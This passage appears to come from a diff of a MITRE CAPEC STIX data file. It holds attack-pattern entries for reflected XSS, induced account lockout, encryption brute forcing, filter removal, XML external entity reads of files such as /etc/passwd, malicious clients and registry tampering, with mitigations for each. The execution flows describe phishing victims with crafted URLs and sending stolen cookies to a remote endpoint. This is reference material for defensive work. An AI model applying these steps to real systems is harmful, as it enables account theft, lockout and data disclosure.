    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before using alternate syntax. These inputs are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and try many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.

    2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag created using alternate syntax to bypass filters.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f9249a2-6d3a-425e-9583-820baa614887", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b5fa953-0ec5-48c2-b9a3-ea2461650cf6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bcece01-19c2-465b-9658-461bae9bfd35", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", + "id": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8be86371-e989-4042-af5b-bfd78a42085f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b307ad0c-ae60-4f03-a5fb-26f4499dc18d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform output validation for all remote content.", + "id": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba695a24-c9fb-4c8a-9012-dc3b1068ec38", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disable scripting languages such as JavaScript in browser", + "id": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1488d37a-9c10-49ea-bce3-d8270b3b9d2f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b3584936-9e95-48a5-bcca-77b2c2f44e5a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", + "external_references": [ + { + "external_id": "CAPEC-2", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/2.html" + }, + { + "external_id": "CWE-645", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/645.html" + }, + { + "description": "Account Access Removal", + "external_id": "T1531", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1531" + } + ], + "id": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Inducing Account Lockout", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Investigate account lockout behavior of system: Investigate the security features present in the system that may trigger an account lockout

    2. Techniques
    Analyze system documentation to find list of events that could potentially cause account lockout
    Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly
    Determine another user's login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out.

  2. Obtain list of user accounts to lock out: Generate a list of valid user accounts to lock out

    3. Techniques
    Obtain list of authorized users using another attack pattern, such as SQL Injection.
    Attempt to create accounts if possible; system should indicate if a user ID is already taken.
    Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts.

Exploit

  1. Lock Out Accounts: Perform lockout procedure for all accounts that the attacker wants to lock out.

    2. Techniques
    For each user ID to be locked out, perform the lockout procedure discovered in the first step.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system has a lockout mechanism.", + "An attacker must be able to reproduce behavior that would result in an account being locked." + ], + "x_capec_resources_required": [ + "Computer with access to the login portion of the target system" + ], + "x_capec_skills_required": { + "Low": "No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.", + "id": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42e9e6ff-2250-40b7-b5c7-26510e85245f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d9b587f-481e-494f-a547-92de65b44c0a", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and made to turn on themselves.", + "id": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", + "external_references": [ + { + "external_id": "CAPEC-20", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + } + ], + "id": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Encryption Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the ciphertext and the encryption algorithm.

Experiment

  1. Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Ciphertext is known.", + "Encryption algorithm and key size are known." + ], + "x_capec_resources_required": [ + "\n A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).\n On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.\n Obviously as N gets large the brute force approach becomes infeasible.\n " + ], + "x_capec_skills_required": { + "Low": "Brute forcing encryption does not require much skill." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--439ff02b-9273-4b92-9c82-0a6912ef0dc7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", + "id": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--24444738-98cb-4371-b7e9-aba1bd3d11ad", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content.", + "external_references": [ + { + "external_id": "CAPEC-200", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/200.html" + } + ], + "id": "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Removal of filters: Input filters, output filters, data masking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information.\n For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records.\n This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.\n ", + "x_capec_prerequisites": [ + "The target application must utilize some sort of filtering mechanism (input, output, or data masking)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.", + "external_references": [ + { + "external_id": "CAPEC-201", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "XXE (Xml eXternal Entity) Attack, Beyond Security", + "external_id": "REF-73", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securitynews/6D0100A5PU.html" + }, + { + "description": "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection", + "external_id": "REF-74", + "source_name": "reference_from_CAPEC", + "url": "http://scary.beasts.org/security/CESA-2007-002.html" + } + ], + "id": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data External Linking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n ", + "\n The following XML snippet would attempt to open the /etc/passwd file:\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.

    2. Techniques
    Use an automated tool to record all instances of URLs that process requests with serialized data.
    Use a browser to manually explore the website and analyze how the application processes serialized data requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious data message that contains references to sensitive files.

  2. Launch an External Linking attack: Send the malicious crafted message containing the reference to a sensitive file to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must follow external data references without validating the validity of the reference target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send serialized data messages with maliciously crafted schema." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure the serialized data processor to only retrieve external entities from trusted sources.", + "id": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-201-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d8b8b0b-8f2d-4cfd-a9fa-dd14e071f340", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "target_ref": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", + "external_references": [ + { + "external_id": "CAPEC-203", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/203.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Modify Registry", + "external_id": "T1112", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1112" + }, + { + "description": "Plist Modification", + "external_id": "T1647", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1647" + } + ], + "id": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulate Registry Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + 